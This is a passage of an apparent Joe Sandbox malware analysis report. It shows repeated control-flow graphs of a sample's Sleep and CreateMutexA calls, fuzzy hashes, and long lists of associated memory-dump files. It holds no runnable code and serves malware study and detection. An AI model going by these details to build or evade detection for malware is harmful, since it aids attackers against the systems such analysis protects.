                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 150e9b15fd14a7301473f72182df8c62199852b32f36317ac953b420cd060ffc
                                                                                                                                                                                                                                                              • Instruction ID: 7256d312f6544626dc756da23ab8b0c71a0858d20183d551d17c12c62c9e472e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 150e9b15fd14a7301473f72182df8c62199852b32f36317ac953b420cd060ffc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15312A317001088BEB18DB78DDC9F6CB7A1EBC531CF24829DE454973D5CB7599808752

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 387 bca682-bca6a2 391 bca6a4-bca6b0 387->391 392 bca6d0-bca6ec 387->392 393 bca6c6-bca6cd call bdd663 391->393 394 bca6b2-bca6c0 391->394 395 bca6ee-bca6fa 392->395 396 bca71a-bca739 392->396 393->392 394->393 397 bca949 394->397 399 bca6fc-bca70a 395->399 400 bca710-bca717 call bdd663 395->400 401 bca73b-bca747 396->401 402 bca767-bca916 call bd80c0 396->402 403 bca94e 397->403 404 bca949 call bf6c6a 397->404 399->397 399->400 400->396 405 bca75d-bca764 call bdd663 401->405 406 bca749-bca757 401->406 411 bca953-bca994 Sleep CreateMutexA 403->411 412 bca94e call bf6c6a 403->412 404->403 405->402 406->397 406->405 419 bca996-bca998 411->419 420 bca9a7-bca9a8 411->420 412->411 419->420 421 bca99a-bca9a5 419->421 421->420
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BCA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C23254), ref: 00BCA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: ac3b1f641f34541027e4bd8c0a4619b37dc8c7d8582f197d752933f9c9e1d702
                                                                                                                                                                                                                                                              • Instruction ID: ba2c07d842bcada40174556df181c7399d507e4ecdeaaacb0bc71598a26a20af
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac3b1f641f34541027e4bd8c0a4619b37dc8c7d8582f197d752933f9c9e1d702
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A3128317001088BEB189B78DD89F6DB7E2EBC6328F2482ADE054973D5D77599808652

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 423 bc9adc-bc9ae8 424 bc9afe-bc9b27 call bdd663 423->424 425 bc9aea-bc9af8 423->425 432 bc9b29-bc9b35 424->432 433 bc9b55-bc9b57 424->433 425->424 426 bca917 425->426 429 bca953-bca994 Sleep CreateMutexA 426->429 430 bca917 call bf6c6a 426->430 439 bca996-bca998 429->439 440 bca9a7-bca9a8 429->440 430->429 435 bc9b4b-bc9b52 call bdd663 432->435 436 bc9b37-bc9b45 432->436 437 bc9b59-bca916 call bd80c0 433->437 438 bc9b65-bc9d91 call bd7a00 call bc5c10 call bc8b30 call bd8220 call bd7a00 call bc5c10 call bc8b30 call bd8220 433->438 435->433 436->426 436->435 439->440 443 bca99a-bca9a5 439->443 443->440
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BCA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C23254), ref: 00BCA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 1d88fbaa364a5bfb737502449fd077226be25412605b986a332b074ae13f59b3
                                                                                                                                                                                                                                                              • Instruction ID: 7f9f30fbd8fd9f087f63e8ecc3d76ca145bee663f206c01e61c8e2e7ac6a830b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d88fbaa364a5bfb737502449fd077226be25412605b986a332b074ae13f59b3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E213731704244DBFB189B68ED8AF6CF7A1EBC1314F2042ADE508977D5DBB599808A51

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 500 bca856-bca86e 501 bca89c-bca89e 500->501 502 bca870-bca87c 500->502 505 bca8a9-bca8b1 call bc7d30 501->505 506 bca8a0-bca8a7 501->506 503 bca87e-bca88c 502->503 504 bca892-bca899 call bdd663 502->504 503->504 508 bca94e 503->508 504->501 516 bca8e4-bca8e6 505->516 517 bca8b3-bca8bb call bc7d30 505->517 510 bca8eb-bca916 call bd80c0 506->510 512 bca953-bca987 Sleep CreateMutexA 508->512 513 bca94e call bf6c6a 508->513 520 bca98e-bca994 512->520 513->512 516->510 517->516 524 bca8bd-bca8c5 call bc7d30 517->524 522 bca996-bca998 520->522 523 bca9a7-bca9a8 520->523 522->523 525 bca99a-bca9a5 522->525 524->516 529 bca8c7-bca8cf call bc7d30 524->529 525->523 529->516 532 bca8d1-bca8d9 call bc7d30 529->532 532->516 535 bca8db-bca8e2 532->535 535->510
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BCA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C23254), ref: 00BCA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
